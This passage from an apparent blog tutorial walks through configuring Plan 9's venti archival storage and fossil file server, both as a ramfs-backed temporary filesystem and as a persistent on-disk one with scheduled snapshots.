; venti/fmtindex /tmp/venti.conf
; venti/conf -w /dev/sdE0/arenas /tmp/venti.conf

We should be all ready to go, so let's start it up with
; venti/venti -c /tmp/venti.conf
You can verify by looking at http://$host:8000/storage, which should give you a summary of the available storage.

Now on to the more fun part, let's make a fossil for this venti. Since we don't really plan to have much data on this, we can use a file through ramfs to get started.


; ramfs
; dd -if /dev/zero -of /tmp/fossil -count 200000 #create a ~100M file (200000 blocks at dd's default 512 bytes)
; cat >/tmp/initfossil.conf <<.
fsys main config /tmp/fossil
fsys main open -AWPV
fsys main
create /active/adm adm sys d775
create /active/adm/users adm sys 664
users -w
uname upas :upas
uname adm +glenda
uname upas +glenda
srv -p fscons.newfs
srv -A fossil.newfs
.
; venti=$ventihost
; fossil/flfmt /tmp/fossil
; fossil/conf -w /tmp/fossil /tmp/initfossil.conf
; fossil/fossil -f /tmp/fossil

Now that it is up and running, let's connect to the fs console, do some additional configuring, and take a snapshot.

; con /srv/fscons.newfs #ctl-\ + q quits
fsys main
uname $user :$user #add our user to fossil
create /active/src $user $user d775 #add a directory for our user to write to
sync # sync all of our changes
snap # write to venti, when it is done you should get a vac
# quit out of con
# clean up
; kill fossil | rc
; unmount /tmp

Now you should be able to take advantage of the 9ants ramfossil script to access the stored data. Just keep track of the vac, and remember that if you want changes to persist, you need to snap the filesystem and note the new vac. If you don't want to keep setting the $venti environment variable, add it as a value for your system under /lib/ndb/local just like $auth. You could add a script to your $home/lib/profile to test for /srv/ramfossil, start ramfossil if needed, and then bind it over $home/src (what I did). You may also want to change the ramdisk fossil size by editing the ramdisk script itself; I found 1G to be fairly reasonable. If the fossil ever fills up, simply snap it to venti and start a new one from the newly generated vac. The lazy loading aspect should keep you covered short of actually reading/writing 1G in one session.

For the sake of completeness, I will also walk through the process of creating a persistent fossil filesystem. Start by using disk/edisk like before, then:


; ramfs
; cat >/tmp/fossil.conf <<.
fsys main config /dev/sdG0/fossil
fsys main open -c 3000
fsys main snaptime -a 0500
srv -p fscons
srv -A fossil
.
; disk/prep -a fossil /dev/sdG0/plan9
; fossil/flfmt /dev/sdG0/fossil
; fossil/conf -w /dev/sdG0/fossil /tmp/fossil.conf
; venti=$myventi fossil/fossil -f /dev/sdG0/fossil
; unmount /tmp

This will set the fossil to snapshot to the venti at 5am. 9ants' fshalt scripts should handle syncing it when the system goes down (note that it will not snapshot). Huge thanks to mycroftiv and his 9ants scripts for helping me figure my way through the install and setup process, and for keeping the fossil and venti system alive and usable for a standard user.